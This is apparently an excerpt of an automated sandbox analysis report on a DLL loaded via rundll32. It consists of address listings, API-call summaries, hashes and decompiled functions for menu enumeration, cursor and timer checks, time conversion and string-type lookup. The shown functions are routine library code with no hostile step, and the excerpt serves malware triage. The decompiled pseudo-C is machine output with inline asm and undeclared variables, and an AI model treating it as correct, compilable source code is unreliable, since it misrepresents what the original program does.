                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032262
                                                                                                            0x10032262
                                                                                                            0x00000000
                                                                                                            0x10032265
                                                                                                            0x100321f8
                                                                                                            0x100321ff
                                                                                                            0x10032202
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032209
                                                                                                            0x1003220d
                                                                                                            0x10032210
                                                                                                            0x10032217
                                                                                                            0x00000000
                                                                                                            0x10032217
                                                                                                            0x10032270
                                                                                                            0x10032270
                                                                                                            0x10032273
                                                                                                            0x10032276
                                                                                                            0x00000000
                                                                                                            0x100321db
                                                                                                            0x10032178
                                                                                                            0x1003217f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032186
                                                                                                            0x1003218a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003218d
                                                                                                            0x10032193
                                                                                                            0x10032197
                                                                                                            0x1003219a
                                                                                                            0x100321ba
                                                                                                            0x100321ba
                                                                                                            0x00000000
                                                                                                            0x100321ba
                                                                                                            0x1003219c
                                                                                                            0x100321a9
                                                                                                            0x100321ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100321af
                                                                                                            0x100321b1
                                                                                                            0x100321b7
                                                                                                            0x00000000
                                                                                                            0x100321b7
                                                                                                            0x10032162
                                                                                                            0x00000000
                                                                                                            0x10032162
                                                                                                            0x10032139
                                                                                                            0x1003213a
                                                                                                            0x1003213d
                                                                                                            0x1003213e
                                                                                                            0x10032143
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032143
                                                                                                            0x10032283

                                                                                                            APIs
                                                                                                              • Part of subcall function 10029BA4: GetFocus.USER32(?,10032120,?), ref: 10029BA5
                                                                                                              • Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
                                                                                                              • Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
                                                                                                              • Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
                                                                                                              • Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
                                                                                                              • Part of subcall function 10029BA4: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 10029C0F
                                                                                                            • GetMenu.USER32(?), ref: 10032170
                                                                                                            • GetMenu.USER32(?), ref: 10032184
                                                                                                            • GetMenuItemCount.USER32 ref: 1003218D
                                                                                                            • GetSubMenu.USER32 ref: 1003219E
                                                                                                            • GetMenuItemCount.USER32 ref: 100321C0
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 100321E1
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 10032209
                                                                                                            • GetMenuItemCount.USER32 ref: 10032240
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 1003225B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 4186786570-0
                                                                                                            • Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                                                            • Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
                                                                                                            • Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                                                            • Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002F502 Relevance: 13.6, APIs: 9, Instructions: 127timekeyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t74;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t90;

				_t89 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E100373DB();
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
				} else {
					_t74 = E10023092(_t89);
					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
						_v8 = _v8 | 0xffffffff;
					}
					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
					if(_t66 != 0) {
						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
					} else {
						_t88 = 0;
					}
					_t68 = E100220EE(_t90, GetCapture());
					if(_t68 != _t89) {
						if(_t68 != 0) {
							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
						} else {
							_t83 = 0;
						}
						if(_t83 != _t88 && E10023092(_t68) == _t74) {
							_v8 = _v8 | 0xffffffff;
						}
					}
				}
				if(_v8 < 0) {
					L25:
					if( *(_v12 + 0x78) == 0xffffffff) {
						KillTimer( *(_t89 + 0x1c), 0xe001);
					}
					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
					goto L28;
				} else {
					ClientToScreen( *(_t89 + 0x1c),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							L28:
							_t53 = 0xe000;
							if(_a4 == 0xe000) {
								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
								if(_v8 >= 0) {
									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
								}
							}
							return _t53;
						}
						goto L25;
					}
					_t60 =  *(_t89 + 0x1c);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t87) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
			}






















                                                                                                            0x1002f50b
                                                                                                            0x1002f50d
                                                                                                            0x1002f516
                                                                                                            0x1002f660
                                                                                                            0x1002f660
                                                                                                            0x1002f523
                                                                                                            0x1002f529
                                                                                                            0x1002f52c
                                                                                                            0x1002f539
                                                                                                            0x1002f54b
                                                                                                            0x1002f550
                                                                                                            0x1002f553
                                                                                                            0x1002f5b6
                                                                                                            0x1002f555
                                                                                                            0x1002f55e
                                                                                                            0x1002f567
                                                                                                            0x1002f574
                                                                                                            0x1002f574
                                                                                                            0x1002f578
                                                                                                            0x1002f57d
                                                                                                            0x1002f583
                                                                                                            0x1002f57f
                                                                                                            0x1002f57f
                                                                                                            0x1002f57f
                                                                                                            0x1002f58d
                                                                                                            0x1002f594
                                                                                                            0x1002f598
                                                                                                            0x1002f59e
                                                                                                            0x1002f59a
                                                                                                            0x1002f59a
                                                                                                            0x1002f59a
                                                                                                            0x1002f5a3
                                                                                                            0x1002f5b0
                                                                                                            0x1002f5b0
                                                                                                            0x1002f5a3
                                                                                                            0x1002f594
                                                                                                            0x1002f5c4
                                                                                                            0x1002f61a
                                                                                                            0x1002f621
                                                                                                            0x1002f62b
                                                                                                            0x1002f62b
                                                                                                            0x1002f633
                                                                                                            0x00000000
                                                                                                            0x1002f5c6
                                                                                                            0x1002f5cd
                                                                                                            0x1002f5d3
                                                                                                            0x1002f5df
                                                                                                            0x1002f5e3
                                                                                                            0x1002f609
                                                                                                            0x1002f609
                                                                                                            0x1002f60c
                                                                                                            0x1002f610
                                                                                                            0x1002f614
                                                                                                            0x1002f618
                                                                                                            0x1002f639
                                                                                                            0x1002f639
                                                                                                            0x1002f641
                                                                                                            0x1002f647
                                                                                                            0x1002f64d
                                                                                                            0x1002f656
                                                                                                            0x1002f656
                                                                                                            0x1002f64d
                                                                                                            0x00000000
                                                                                                            0x1002f65d
                                                                                                            0x00000000
                                                                                                            0x1002f618
                                                                                                            0x1002f5e5
                                                                                                            0x1002f5ea
                                                                                                            0x00000000
                                                                                                            0x1002f5f8
                                                                                                            0x1002f5fb
                                                                                                            0x1002f600
                                                                                                            0x1002f602
                                                                                                            0x1002f602
                                                                                                            0x1002f607
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002f607
                                                                                                            0x1002f5ea

                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002F50D
                                                                                                            • GetCursorPos.USER32(?), ref: 1002F52C
                                                                                                            • ScreenToClient.USER32 ref: 1002F539
                                                                                                            • GetCapture.USER32 ref: 1002F586
                                                                                                              • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                                                            • ClientToScreen.USER32(?,?), ref: 1002F5CD
                                                                                                            • WindowFromPoint.USER32(?,?), ref: 1002F5D9
                                                                                                            • IsChild.USER32(?,00000000), ref: 1002F5EE
                                                                                                            • KillTimer.USER32(?,0000E001), ref: 1002F62B
                                                                                                            • KillTimer.USER32(?,0000E000), ref: 1002F647
                                                                                                              • Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
                                                                                                              • Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                                                            • String ID:
                                                                                                            • API String ID: 1383385731-0
                                                                                                            • Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                                                            • Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
                                                                                                            • Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                                                            • Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001328A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
							_v20 = _t138;
							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E10013780(_t147, _v28, 4, 0);
								asm("adc eax, edx");
								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E10018BEF( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
									return memcpy(_t141, _t105, _t133 << 2);
								}
								E100193FB(_t150, _t169);
								_t109 =  *0x1004cde8; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E100134E7(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E100134E7(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}







































                                                                                                            0x1001328a
                                                                                                            0x10013293
                                                                                                            0x10013295
                                                                                                            0x10013298
                                                                                                            0x10013299
                                                                                                            0x1001329b
                                                                                                            0x1001329e
                                                                                                            0x100132a1
                                                                                                            0x100134d0
                                                                                                            0x100134d0
                                                                                                            0x100134d0
                                                                                                            0x00000000
                                                                                                            0x100132b2
                                                                                                            0x100132b2
                                                                                                            0x100132b6
                                                                                                            0x00000000
                                                                                                            0x100132cc
                                                                                                            0x100132cc
                                                                                                            0x100132d1
                                                                                                            0x100132d8
                                                                                                            0x100132db
                                                                                                            0x100132dc
                                                                                                            0x100132de
                                                                                                            0x100132e0
                                                                                                            0x100132e1
                                                                                                            0x100132e4
                                                                                                            0x100132e7
                                                                                                            0x100132ec
                                                                                                            0x100132f1
                                                                                                            0x100132f5
                                                                                                            0x100132f8
                                                                                                            0x100132f8
                                                                                                            0x100132fc
                                                                                                            0x10013300
                                                                                                            0x00000000
                                                                                                            0x10013312
                                                                                                            0x10013312
                                                                                                            0x10013316
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10013316
                                                                                                            0x10013327
                                                                                                            0x10013327
                                                                                                            0x10013327
                                                                                                            0x10013338
                                                                                                            0x1001333c
                                                                                                            0x1001333f
                                                                                                            0x1001334e
                                                                                                            0x10013371
                                                                                                            0x1001337d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001337f
                                                                                                            0x1001337f
                                                                                                            0x10013382
                                                                                                            0x10013384
                                                                                                            0x10013388
                                                                                                            0x10013388
                                                                                                            0x1001338c
                                                                                                            0x10013392
                                                                                                            0x10013397
                                                                                                            0x10013398
                                                                                                            0x1001339b
                                                                                                            0x1001339d
                                                                                                            0x100133aa
                                                                                                            0x100133ae
                                                                                                            0x100133b1
                                                                                                            0x100133bf
                                                                                                            0x100133c7
                                                                                                            0x100133ca
                                                                                                            0x100133cd
                                                                                                            0x100133de
                                                                                                            0x100133e4
                                                                                                            0x100133fb
                                                                                                            0x10013400
                                                                                                            0x1001340a
                                                                                                            0x10013411
                                                                                                            0x1001341a
                                                                                                            0x1001341d
                                                                                                            0x1001341f
                                                                                                            0x10013428
                                                                                                            0x10013434
                                                                                                            0x1001343a
                                                                                                            0x1001343e
                                                                                                            0x1001344a
                                                                                                            0x1001344d
                                                                                                            0x10013454
                                                                                                            0x10013459
                                                                                                            0x1001345d
                                                                                                            0x1001345f
                                                                                                            0x10013462
                                                                                                            0x10013464
                                                                                                            0x10013467
                                                                                                            0x1001346a
                                                                                                            0x1001346d
                                                                                                            0x100134b7
                                                                                                            0x100134bc
                                                                                                            0x100134bf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100134c1
                                                                                                            0x100134cb
                                                                                                            0x00000000
                                                                                                            0x100134cc
                                                                                                            0x1001346f
                                                                                                            0x10013474
                                                                                                            0x10013479
                                                                                                            0x1001347a
                                                                                                            0x10013481
                                                                                                            0x10013484
                                                                                                            0x1001348c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001348e
                                                                                                            0x10013491
                                                                                                            0x10013493
                                                                                                            0x1001349c
                                                                                                            0x100134a1
                                                                                                            0x100134a2
                                                                                                            0x100134a9
                                                                                                            0x100134ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10013493
                                                                                                            0x1001334e
                                                                                                            0x100132d1
                                                                                                            0x100132b6

                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 10013342
                                                                                                            • __allrem.LIBCMT ref: 1001335A
                                                                                                            • __allrem.LIBCMT ref: 10013376
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4
                                                                                                              • Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                                                            • String ID: E
                                                                                                            • API String ID: 4106114094-3568589458
                                                                                                            • Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                                                            • Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
                                                                                                            • Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                                                            • Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001843D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x10042730);
				E10012514(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x1004f740 - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x1004f740 = 2;
						}
					} else {
						 *0x1004f740 = 1;
					}
				}
				_t42 =  *0x1004f740; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x1004f724; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x1004f734; // 0x0
					}
					_t43 = E1001A444(_t67, _t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(__eflags != 0) {
								_push(_t83);
								E100107C8(_t67, _t78, _t83, __eflags);
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E1001254F(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x1004f734; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E10011C50(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							_t102 =  *(_t85 - 0x20);
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E100107C8(_t68, _t79, _t84, _t102);
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E1001382A(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}



















                                                                                                            0x1001843d
                                                                                                            0x1001843d
                                                                                                            0x1001843f
                                                                                                            0x10018444
                                                                                                            0x10018449
                                                                                                            0x1001844b
                                                                                                            0x10018451
                                                                                                            0x10018469
                                                                                                            0x10018473
                                                                                                            0x10018479
                                                                                                            0x1001847c
                                                                                                            0x1001847e
                                                                                                            0x1001847e
                                                                                                            0x1001846b
                                                                                                            0x1001846b
                                                                                                            0x1001846b
                                                                                                            0x10018469
                                                                                                            0x10018488
                                                                                                            0x10018490
                                                                                                            0x10018580
                                                                                                            0x10018583
                                                                                                            0x10018585
                                                                                                            0x10018587
                                                                                                            0x10018587
                                                                                                            0x1001858d
                                                                                                            0x10018590
                                                                                                            0x10018592
                                                                                                            0x10018594
                                                                                                            0x10018594
                                                                                                            0x1001859b
                                                                                                            0x100185a1
                                                                                                            0x100185a4
                                                                                                            0x100185aa
                                                                                                            0x100185ac
                                                                                                            0x100185cc
                                                                                                            0x100185df
                                                                                                            0x100185e1
                                                                                                            0x100185e3
                                                                                                            0x100185e5
                                                                                                            0x100185e6
                                                                                                            0x100185eb
                                                                                                            0x100185ec
                                                                                                            0x00000000
                                                                                                            0x100185ec
                                                                                                            0x100185ae
                                                                                                            0x100185b0
                                                                                                            0x100185b5
                                                                                                            0x100185b6
                                                                                                            0x100185b9
                                                                                                            0x100185ba
                                                                                                            0x100185c3
                                                                                                            0x100185c5
                                                                                                            0x100185c7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100185c9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001849e
                                                                                                            0x100184a1
                                                                                                            0x100185a6
                                                                                                            0x100185a6
                                                                                                            0x100185ee
                                                                                                            0x100185f6
                                                                                                            0x100185f6
                                                                                                            0x100184a7
                                                                                                            0x100184aa
                                                                                                            0x100184b0
                                                                                                            0x100184b2
                                                                                                            0x100184b7
                                                                                                            0x100184b7
                                                                                                            0x100184db
                                                                                                            0x100184dd
                                                                                                            0x100184e2
                                                                                                            0x00000000
                                                                                                            0x100184e8
                                                                                                            0x100184e8
                                                                                                            0x100184ec
                                                                                                            0x100184f7
                                                                                                            0x100184fc
                                                                                                            0x100184ff
                                                                                                            0x10018501
                                                                                                            0x10018508
                                                                                                            0x10018510
                                                                                                            0x1001852b
                                                                                                            0x1001852d
                                                                                                            0x10018546
                                                                                                            0x10018553
                                                                                                            0x1001855b
                                                                                                            0x1001856b
                                                                                                            0x1001856b
                                                                                                            0x1001856e
                                                                                                            0x10018572
                                                                                                            0x10018574
                                                                                                            0x10018575
                                                                                                            0x1001857a
                                                                                                            0x1001857b
                                                                                                            0x00000000
                                                                                                            0x1001852f
